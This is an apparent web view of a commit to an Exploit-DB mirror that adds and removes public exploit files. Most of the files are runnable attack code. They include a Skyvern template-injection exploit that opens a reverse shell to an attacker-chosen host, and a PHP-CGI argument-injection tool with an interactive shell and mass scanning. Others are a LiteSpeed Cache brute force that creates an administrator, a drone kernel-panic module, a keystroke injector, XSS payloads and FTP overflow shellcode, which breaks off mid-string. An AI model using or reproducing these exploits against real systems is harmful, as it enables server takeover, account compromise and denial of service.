bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-06-16

Browse source 
15 changes to exploits/shellcodes/ghdb

AirKeyboard iOS App 1.0.5 - Remote Input Injection

Parrot and DJI variants Drone OSes - Kernel Panic Exploit

Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

Microsoft Excel Use After Free - Local Code Execution

PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan FTP Server 2.0.7 - Remote Buffer Overflow

WebDAV Windows 10 - Remote Code Execution (RCE)

Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2025-06-16 00:18:32 +00:00
parent b83d852b2f
commit 3cfac1e6a4
13 changed files with 1187 additions and 170 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

61
exploits/ios/remote/52333.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
# Date: 2025-06-13
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://airkeyboardapp.com
# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
# Version: Version 1.0.5
# Tested on: iOS 18.5 with AirKeyboard app
'''
Description:
The AirKeyboard iOS application exposes a WebSocket server on port 8888
which accepts arbitrary input injection messages from any client.
No authentication or pairing process is required. This allows any
attacker to type arbitrary keystrokes directly into the victims iOS device
in real-time without user interaction, resulting in full remote input
control.
'''
import websocket
import json
import time
target_ip = "192.168.8.101"
ws_url = f"ws://{target_ip}:8888"
text = "i'm hacker i can write on your keyboard :)"
keystroke_payload = {
"type": 1,
"text": f"{text}",
"mode": 0,
"shiftKey": True,
"selectionStart": 1,
"selectionEnd": 1
}
def send_payload(ws):
print("[+] Sending remote keystroke...")
ws.send(json.dumps(keystroke_payload))
time.sleep(1)
ws.close()
def on_open(ws):
send_payload(ws)
def on_error(ws, error):
print(f"[!] Error: {error}")
def on_close(ws, close_status_code, close_msg):
print("[*] Connection closed")
def exploit():
print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
ws = websocket.WebSocketApp(ws_url,
on_open=on_open,
on_error=on_error,
on_close=on_close)
ws.run_forever()
if __name__ == "__main__":
exploit()

223
exploits/multiple/local/52329.py Executable file
View file

@ -0,0 +1,223 @@
#!/usr/bin/env python3
# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-10
# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M
# CVE: CVE-2025-37928
# Type: Local Privilege Escalation / Kernel Panic
# Platform: Linux-based drone OS (Parrot and DJI variants)
# Author Country: Jordan
# CVSS v3.1 Score: 7.3 (Important)
# Weakness: CWE-284: Improper Access Control
# Attack Vector: Local
# User Interaction: None
# Scope: Unchanged
# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic)
# Exploit Code Maturity: Proof of Concept
# Remediation Level: Official Fix Available
#
# Description:
# This PoC triggers a kernel panic by calling schedule() inside an atomic context,
# exploiting CVE-2025-37928 present in certain Linux kernels running on
# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems.
#
# Steps of exploitation:
# 1. Check if running as root.
# 2. Verify kernel version vulnerability.
# 3. Detect drone type from system files.
# 4. Build and load vulnerable kernel module.
# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context.
#
# Affected Drone Versions:
# - Parrot QRD
# - Parrot Alpha-M (DT)
# - DJI QRD
# - DJI Alpha-M (DT)
#
# ------------------------------------------------------------------------------
# Usage:
# sudo python3 cve_2025_37928_tool.py [OPTIONS]
#
# Options:
# --dry-run Run detection & build only (no module loading)
# --force Force exploit even if kernel not detected as vulnerable
# --cleanup-only Remove the kernel module without triggering panic
# --verbose Enable detailed logging and debug output
# --help Show usage information
#
# Examples:
# sudo python3 cve_2025_37928_tool.py --dry-run
# sudo python3 cve_2025_37928_tool.py
# sudo python3 cve_2025_37928_tool.py --force
# sudo python3 cve_2025_37928_tool.py --cleanup-only
#
# Warning:
# This PoC causes an immediate kernel panic.
# Use it ONLY in isolated and controlled environments (e.g., lab tests).
# ------------------------------------------------------------------------------
import os
import sys
import subprocess
import tempfile
import argparse
import shutil
import platform
MODULE_NAME = "cve_2025_37928_poc"
C_FILENAME = MODULE_NAME + ".c"
KO_FILENAME = MODULE_NAME + ".ko"
KERNEL_MODULE_CODE = r'''
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/interrupt.h>
#include <linux/sched.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("PoC Author");
MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic");
static void trigger_panic_tasklet(unsigned long data)
{
pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n");
schedule(); // This causes kernel panic
}
DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0);
static int __init poc_init(void)
{
pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n");
tasklet_schedule(&my_tasklet);
return 0;
}
static void __exit poc_exit(void)
{
tasklet_kill(&my_tasklet);
pr_info("[CVE-2025-37928] PoC module unloaded\n");
}
module_init(poc_init);
module_exit(poc_exit);
'''
MAKEFILE_CONTENT = f'''
obj-m += {MODULE_NAME}.o
all:
\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
'''
def check_root():
if os.geteuid() != 0:
print("[-] Must be run as root.")
sys.exit(1)
def detect_kernel():
version = platform.release()
vulnerable_versions = ["5.10", "5.15", "6.0"]
vulnerable = any(v in version for v in vulnerable_versions)
print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}")
return vulnerable
def detect_drone_type():
print("[*] Detecting drone type...")
files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"]
found = []
for path in files:
if os.path.exists(path):
try:
with open(path, "r") as f:
content = f.read().strip()
if any(x in content for x in ["Parrot", "DJI"]):
found.append(content)
except:
continue
if found:
for d in found:
print(f" [i] Found: {d}")
else:
print(" [!] No drone ID found.")
return found
def write_module(tempdir):
c_path = os.path.join(tempdir, C_FILENAME)
makefile_path = os.path.join(tempdir, "Makefile")
with open(c_path, "w") as f:
f.write(KERNEL_MODULE_CODE)
with open(makefile_path, "w") as f:
f.write(MAKEFILE_CONTENT)
return c_path
def build_module(tempdir):
print("[*] Building module...")
result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True)
if result.returncode != 0:
print("[-] Build failed:\n", result.stderr)
sys.exit(1)
print("[+] Build successful.")
return os.path.join(tempdir, KO_FILENAME)
def load_module(ko_path):
print("[*] Loading kernel module...")
result = subprocess.run(["insmod", ko_path], capture_output=True, text=True)
if result.returncode != 0:
print("[-] insmod failed:\n", result.stderr)
sys.exit(1)
print("[!] Module loaded. Kernel panic should occur if vulnerable.")
def unload_module():
print("[*] Attempting to remove module...")
subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL)
print("[+] Module removal attempted.")
def clean_build(tempdir):
subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def main():
parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes")
parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation")
parser.add_argument("--force", action="store_true", help="Force execution even if version unknown")
parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded")
args = parser.parse_args()
check_root()
if args.cleanup_only:
unload_module()
return
vulnerable = detect_kernel()
detect_drone_type()
if not vulnerable and not args.force:
print("[-] Kernel not identified as vulnerable. Use --force to override.")
sys.exit(1)
if args.dry_run:
print("[*] Dry run mode. Exiting before exploitation.")
return
with tempfile.TemporaryDirectory() as tempdir:
print(f"[*] Working directory: {tempdir}")
write_module(tempdir)
ko_path = build_module(tempdir)
try:
load_module(ko_path)
except KeyboardInterrupt:
print("[!] Interrupted. Attempting cleanup...")
finally:
unload_module()
clean_build(tempdir)
if __name__ == "__main__":
main()

119
exploits/multiple/webapps/52335.py Executable file
View file

@ -0,0 +1,119 @@
# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
# Date: 2025-06-15
# Exploit Author: Cristian Branet
# Vendor Homepage: https://www.skyvern.com/
# Software Link: https://github.com/Skyvern-AI/skyvern
# Version: < 0.1.85, before commit db856cd
# Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04)
# CVE : CVE-2025-49619
# Article: https://cristibtz.github.io/posts/CVE-2025-49619/
'''
Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.
An attacker with low privileges can inject a malicious payload in a block that contains Prompt section,
which gets rendered server-side, resulting in blind remote code execution via curl.
'''
import requests, argparse, pyfiglet
parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)")
parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key")
parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")
def create_exploit_workflow(url, ip, port, x_api_key):
exploit_workflow = {
"title": "Exploit",
"description": "",
"proxy_location": "RESIDENTIAL",
"webhook_callback_url": "",
"persist_browser_session": False,
"model": None,
"totp_verification_url": None,
"workflow_definition": {
"parameters": [],
"blocks": [
{
"label": "block_1",
"continue_on_failure": False,
"block_type": "task_v2",
"prompt": (
"{% for x in ().__class__.__base__.__subclasses__() %}\n"
" {% if 'warning' in x.__name__ %}\n"
" {{ x()._module.__builtins__['__import__']('os').popen(\n"
" \"python3 -c 'import socket,os,pty;\"\n"
" \"s=socket.socket();\"\n"
f" \'s.connect((\\\"{ip}\\\",{port}));\'\n"
" \"os.dup2(s.fileno(),0);\"\n"
" \"os.dup2(s.fileno(),1);\"\n"
" \"os.dup2(s.fileno(),2);\"\n"
" \"pty.spawn(\\\"sh\\\")'\"\n"
" ).read() }}\n"
" {% endif %}\n"
"{% endfor %}"
),
"url": "",
"max_steps": 25,
"totp_identifier": None,
"totp_verification_url": None
}
]
},
"is_saved_task": False
}
headers = {
"Content-Type": "application/json",
"X-API-Key": x_api_key
}
response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers)
if response.status_code == 200:
print("[+] Exploit workflow created successfully!")
else:
print("[-] Failed to create exploit workflow:", response.text)
return None
workflow_permanent_id = response.json().get("workflow_permanent_id")
print(f"[+] Workflow Permanent ID: {workflow_permanent_id}")
return workflow_permanent_id
def run_exploit_workflow(url, x_api_key, workflow_permanent_id):
workflow_data = {
"workflow_id": workflow_permanent_id
}
headers = {
"Content-Type": "application/json",
"X-API-Key": x_api_key
}
response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)
if response.status_code == 200:
print("[+] Exploit workflow executed successfully!")
else:
print("[-] Failed to execute exploit workflow:", response.text)
if __name__=="__main__":
print("\n")
print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
print("Author: Cristian Branet")
print("GitHub: github.com/cristibtz")
print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.")
print("\n")
args = parser.parse_args()
url = args.url
x_api_key = args.x_api_key
ip = args.ip
port = args.port
workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key)
run_exploit_workflow(url, x_api_key, workflow_permanent_id)

39
exploits/php/webapps/52147.NA
View file

@ -1,39 +0,0 @@
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://anchorcms.com/
# Software Link:
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
# Version: latest
# Tested on: MacOS
# Log in to Anchor CMS.
# Click on "Create New Post".
# Fill in the "Title" and enter the following payload in the field
immediately below:
# "><script>alert()</script>
# Go to the homepage, and you will see the alert!
### PoC Request ###
POST /anchor/admin/posts/edit/2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
anchorcms=hlko7b1dbdpjgn58himf2obht5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false

27
exploits/php/webapps/52327.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:"/admin/pages/add" "Anchor CMS"
# Date: 2025-06-08
# Exploit Author: /bin/neko
# Vendor Homepage: http://anchorcms.com
# Software Link: https://github.com/anchorcms/anchor-cms
# Version: 0.12.7
# Tested on: Ubuntu 22.04 + Apache2 + PHP 8.1
# CVE: CVE-2025-46041
# Description:
Anchor CMS v0.12.7 suffers from a stored Cross-Site Scripting (XSS) vulnerability
in the `markdown` field of the /admin/pages/add page.
An authenticated user with page creation privileges can inject arbitrary JavaScript,
which is stored and executed when the page is viewed.
# Steps to Reproduce:
1. Login to /admin
2. Navigate to Pages > Add Page
3. In the `Markdown` field, insert:
<script>alert(document.domain)</script>
4. Save the page.
5. View the created page. The script executes.
# Impact:
- Arbitrary JavaScript execution
- Potential session hijacking or admin impersonation

129
exploits/php/webapps/52328.py Executable file
View file

@ -0,0 +1,129 @@
# Exploit Title: Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation
# Date: 2025-06-10
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Country: United Kingdom
# CVE : CVE-2024-28000
import requests
import random
import string
import concurrent.futures
# Configuration
target_url = 'http://example.com'
rest_api_endpoint = '/wp-json/wp/v2/users'
ajax_endpoint = '/wp-admin/admin-ajax.php'
admin_user_id = '1'
num_hash_attempts = 1000000
num_workers = 10
new_username = 'newadminuser' # Replace with desired username
new_user_password = 'NewAdminPassword123!' # Replace with a secure password
def mt_srand(seed=None):
"""
Mimics PHP's mt_srand function by setting the seed for random number
generation.
"""
random.seed(seed)
def mt_rand(min_value=0, max_value=2**32 - 1):
"""
Mimics PHP's mt_rand function by generating a random number within the
specified range.
"""
return random.randint(min_value, max_value)
def generate_random_string(length=6):
"""
Generates a random string based on the output of mt_rand.
"""
chars = string.ascii_letters + string.digits
return ''.join(random.choices(chars, k=length))
def trigger_hash_generation():
payload = {
'action': 'async_litespeed',
'litespeed_type': 'crawler'
}
try:
response = requests.post(f'{target_url}{ajax_endpoint}',
data=payload)
if response.status_code == 200:
print('[INFO] Triggered hash generation.')
else:
print(f'[ERROR] Failed to trigger hash generation - Status
code: {response.status_code}')
except requests.RequestException as e:
print(f'[ERROR] AJAX request failed: {e}')
def attempt_hash(hash_value):
cookies = {
'litespeed_hash': hash_value,
'litespeed_role': admin_user_id
}
try:
response = requests.post(f'{target_url}{rest_api_endpoint}',
cookies=cookies)
return response, cookies
except requests.RequestException as e:
print(f'[ERROR] Request failed: {e}')
return None, None
def create_admin_user(cookies):
user_data = {
'username': new_username,
'password': new_user_password,
'email': f'{new_username}@example.com',
'roles': ['administrator']
}
try:
response = requests.post(f'{target_url}{rest_api_endpoint}',
cookies=cookies, json=user_data)
if response.status_code == 201:
print(f'[SUCCESS] New admin user "{new_username}" created
successfully!')
else:
print(f'[ERROR] Failed to create admin user - Status code:
{response.status_code} - Response: {response.text}')
except requests.RequestException as e:
print(f'[ERROR] User creation request failed: {e}')
def worker():
for _ in range(num_hash_attempts // num_workers):
random_string = generate_random_string()
print(f'[DEBUG] Trying hash: {random_string}')
response, cookies = attempt_hash(random_string)
if response is None:
continue
print(f'[DEBUG] Response status code: {response.status_code}')
print(f'[DEBUG] Response content: {response.text}')
if response.status_code == 201:
print(f'[SUCCESS] Valid hash found: {random_string}')
create_admin_user(cookies)
return
elif response.status_code == 401:
print(f'[FAIL] Invalid hash: {random_string}')
else:
print(f'[ERROR] Unexpected response for hash: {random_string} -
Status code: {response.status_code}')
def main():
# Seeding the random number generator (mimicking mt_srand)
mt_srand()
trigger_hash_generation()
with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as
executor:
futures = [executor.submit(worker) for _ in range(num_workers)]
concurrent.futures.wait(futures)
if __name__ == '__main__':
main()

296
exploits/php/webapps/52331.py Executable file
View file

@ -0,0 +1,296 @@
#!/usr/bin/env python3
# Exploit Title: PHP CGI Module 8.3.4 - Remote Code Execution (RCE)
# Date: 2025-06-13
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/yigitsql ( old account banned )
# Vendor Homepage: https://www.php.net/
# Software Link: https://www.php.net/downloads
# Version: PHP < 8.3.4, PHP < 8.2.17, PHP < 8.1.27
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-4577
# Description:
# A critical vulnerability in PHP's CGI implementation allows remote attackers to execute
# arbitrary code through command injection. The vulnerability exists due to improper handling
# of command-line arguments in PHP CGI, which can be exploited to bypass security restrictions
# and execute arbitrary commands with the privileges of the web server. This vulnerability
# affects all PHP versions before 8.3.4, 8.2.17, and 8.1.27.
#
# Impact:
# - Remote Code Execution (RCE)
# - Information Disclosure
# - Server Compromise
#
# References:
# - https://nvd.nist.gov/vuln/detail/cve-2024-4577
# - https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure
# - https://www.tarlogic.com/blog/cve-2024-4577-critical-vulnerability-php/
# - https://learn.microsoft.com/en-us/answers/questions/1725847/php-8-3-vulnerability-cve-2024-4577
# - https://www.stormshield.com/news/security-alert-php-cve-2024-4577-stormshields-product-response/
#
# Requirements: urllib3>=1.26.0, rich, requests>=2.25.0, alive_progress, concurrent.futures
import re
import sys
import base64
import requests
import argparse
from rich.console import Console
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
from alive_progress import alive_bar
from concurrent.futures import ThreadPoolExecutor, as_completed
disable_warnings(InsecureRequestWarning)
console = Console()
class PHPCGIExploit:
"""CVE-2024-4577 PHP CGI Argument Injection RCE Exploit"""
def __init__(self):
self.headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
}
# Optimized settings for PHP CGI argument injection
self.php_settings = [
"-d cgi.force_redirect=0",
"-d cgi.redirect_status_env=0",
"-d fastcgi.impersonate=1",
"-d open_basedir=",
"-d disable_functions=",
"-d auto_prepend_file=php://input",
"-d allow_url_include=1",
"-d allow_url_fopen=1"
]
# Soft hyphen character for Windows systems
self.soft_hyphen = "%AD" # 0xAD character
# Different PHP CGI paths to try
self.cgi_paths = [
"/php-cgi/php-cgi.exe",
"/php/php-cgi.exe",
"/cgi-bin/php-cgi.exe",
"/php-cgi.exe",
"/php.exe",
"/php/php.exe"
]
def ascii_art(self):
print("")
console.print("[bold red] ____ _ _ ____ ____ ____ ___[/bold red]")
console.print("[bold red] | _ \| | | | _ \ / ___|/ ___|_ _|[/bold red]")
console.print("[bold red] | |_) | |_| | |_) | | | | | _ | |[/bold red]")
console.print("[bold red] | __/| _ | __/ | |___| |_| || |[/bold red]")
console.print("[bold red] |_| |_| |_|_| \____|\____|___|[/bold red]")
console.print("[bold yellow] CVE-2024-4577 Exploit[/bold yellow]")
console.print("[dim white] PHP CGI Argument Injection[/dim white]")
console.print("[dim cyan] Developer: @ibrahimsql[/dim cyan]")
print("")
def build_payload_url(self, cgi_path):
# Argument injection with soft hyphen
settings_str = " ".join(self.php_settings).replace("-", self.soft_hyphen)
settings_str = settings_str.replace("=", "%3D").replace(" ", "+")
return f"{cgi_path}?{settings_str}"
def execute_command(self, target, command="whoami", cgi_path=None):
"""Execute command on target using PHP CGI argument injection"""
try:
# Create PHP code
php_code = f"""<?php
error_reporting(0);
echo '[START]';
system('{command}');
echo '[END]';
die();
?>"""
# If no CGI path specified, try all paths
if cgi_path:
paths_to_try = [cgi_path]
else:
paths_to_try = self.cgi_paths
for path in paths_to_try:
try:
payload_url = self.build_payload_url(path)
full_url = f"{target.rstrip('/')}{payload_url}"
response = requests.post(
full_url,
headers=self.headers,
data=php_code,
timeout=10,
verify=False,
allow_redirects=False
)
# Check output
if response.status_code == 200:
output_match = re.search(r'\[START\](.*?)\[END\]', response.text, re.DOTALL)
if output_match:
return output_match.group(1).strip(), path
except requests.exceptions.RequestException:
continue
return None, None
except Exception as e:
console.print(f"[red][-][/red] Error: {str(e)}")
return None, None
def check_vulnerability(self, target):
"""Check if target is vulnerable"""
console.print(f"[blue][*][/blue] Testing target: {target}")
# Test with a simple command
result, cgi_path = self.execute_command(target, "echo CVE-2024-4577-TEST")
if result and "CVE-2024-4577-TEST" in result:
console.print(f"[green][+][/green] Target is vulnerable! CGI Path: {cgi_path}")
# Get system information
sys_info, _ = self.execute_command(target, "systeminfo", cgi_path)
if sys_info:
console.print("[green][+][/green] System Information:")
console.print(f"[dim]{sys_info[:500]}...[/dim]") # First 500 characters
return True, cgi_path
else:
console.print(f"[red][-][/red] Target is not vulnerable")
return False, None
def interactive_shell(self, target, cgi_path):
"""Interactive shell session - Simple version"""
console.print("[green][+][/green] Interactive shell opened")
console.print("[yellow][!][/yellow] Type 'exit' to quit, 'clear' to clear screen")
while True:
try:
# Simple input prompt
cmd = input("shell> ")
if cmd.lower() == "exit":
break
elif cmd.lower() == "clear":
print("\033[2J\033[H", end="")
continue
elif cmd.strip() == "":
continue
# Execute command
result, _ = self.execute_command(target, cmd, cgi_path)
if result:
print(result)
else:
console.print("[red][-][/red] Command execution failed")
except KeyboardInterrupt:
console.print("\n[yellow][!][/yellow] Use 'exit' to quit")
except Exception as e:
console.print(f"[red][-][/red] Error: {str(e)}")
def exploit_target(self, target, output_file=None):
"""Exploit single target"""
is_vulnerable, cgi_path = self.check_vulnerability(target)
if is_vulnerable:
# Save results
if output_file:
with open(output_file, "a") as f:
f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
# Start interactive shell
console.print("[blue][*][/blue] Starting interactive shell...")
self.interactive_shell(target, cgi_path)
else:
if output_file:
with open(output_file, "a") as f:
f.write(f"[-] Not vulnerable: {target}\n")
def scan_multiple_targets(self, targets_file, threads=5, output_file=None):
"""Scan multiple targets"""
try:
with open(targets_file, "r") as f:
targets = [line.strip() for line in f if line.strip()]
if not targets:
console.print("[red][-][/red] No targets found in file")
return
console.print(f"[blue][*][/blue] Scanning {len(targets)} targets with {threads} threads")
vulnerable_targets = []
def scan_target(target):
try:
is_vulnerable, cgi_path = self.check_vulnerability(target)
if is_vulnerable:
vulnerable_targets.append((target, cgi_path))
if output_file:
with open(output_file, "a") as f:
f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n")
except Exception as e:
console.print(f"[red][-][/red] Error scanning {target}: {str(e)}")
with alive_bar(len(targets), title="Scanning", bar="smooth") as bar:
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = [executor.submit(scan_target, target) for target in targets]
for future in as_completed(futures):
future.result()
bar()
# Summary
print("")
console.print(f"[green][+][/green] Found {len(vulnerable_targets)} vulnerable targets")
if vulnerable_targets:
console.print("\n[bold]Vulnerable Targets:[/bold]")
for target, cgi_path in vulnerable_targets:
console.print(f" [green]•[/green] {target} (CGI: {cgi_path})")
except FileNotFoundError:
console.print(f"[red][-][/red] File not found: {targets_file}")
except Exception as e:
console.print(f"[red][-][/red] Error: {str(e)}")
def main():
"""Main function"""
exploit = PHPCGIExploit()
exploit.ascii_art()
parser = argparse.ArgumentParser(
description="CVE-2024-4577 - PHP CGI Argument Injection RCE Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt -t 10 -o results.txt
Note: This tool is for educational and authorized testing purposes only.
"""
)
parser.add_argument("-u", "--url", help="Single target URL")
parser.add_argument("-f", "--file", help="File containing target URLs")
parser.add_argument("-o", "--output", help="Output file for results")
parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads (default: 5)")
args = parser.parse_args()
if args.url:
exploit.exploit_target(args.url, args.output)
elif args.file:
exploit.scan_multiple_targets(args.file, args.threads, args.output)
else:
parser.print_help()
sys.exit(1)
if __name__ == "__main__":
main()

67
exploits/windows/local/52332.txt Normal file
View file

@ -0,0 +1,67 @@
# Titles: Microsoft Excel Use After Free - Local Code Execution
# Author: nu11secur1ty
# Date: 06/09/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
# Versions: MS Excel 2016, MS Office Online Server KB5002699
# CVE-2025-27751
## Description:
The attacker can trick any user into opening and executing their code by
sending a malicious DOCX file via email or a streaming server.
After the execution of the victim, his machine can be infected or even
worse than ever; this could be the end of his Windows machine!
STATUS: HIGH-CRITICAL Vulnerability
[+]Exploit:
```
Sub hello()
Dim Program As String
Dim TaskID As Double
On Error Resume Next
---------------------------------------
Program = "WRITE YOUR OWN EXPLOIT HERE"
TaskID = ...YOUR TASK HERE...
---------------------------------------
If Err <> 0 Then
MsgBox "Can't start " & Program
End If
End Sub
```
# Reproduce:
[href](https://www.youtube.com/watch?v=ArI0ZeChYE4)
# Buy an exploit only:
[href](https://satoshidisk.com/pay/COb5oS)
# Time spent:
00:35:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

129
exploits/windows/remote/26471.NA
View file

@ -1,129 +0,0 @@
#!/usr/bin/env python
import signal
from time import sleep
from socket import *
from sys import exit, exc_info
#
# Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
# Discovered and Reported******June 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
# Tested Commands*************USER (Other commands were not tested and may be vulnerable)
# CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending
#
def sigHandle(signum, frm): # Signal handler
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>"))
server = inet_ntoa(server)
break
except:
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
sleep(1)
continue
return server
def main():
print ("""\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command
[*] Discovered and Reported******June 2013
[*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
[*] Exploit/Advisory*************http://infosec42.blogspot.com/
[*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21)
[*] Tested Commands*************USER (Other commands were not tested and may be vulnerable)
[*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""")
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
victim = targServer()
port = int(21)
Cmd = "USER " #Vulnerable command
JuNk = "\x42" * 2004
# KERNEL32.dll 7CA58265 - JMP ESP
ret = "\x65\x82\xA5\x7C"
NOP = "\x90" * 50
#348 Bytes Bind Shell Port TCP/4444
#msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=4444 R |
#msfencode -e x86/shikata_ga_nai -c 1 -b "\x0d\x0a\x00\xf1" R
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
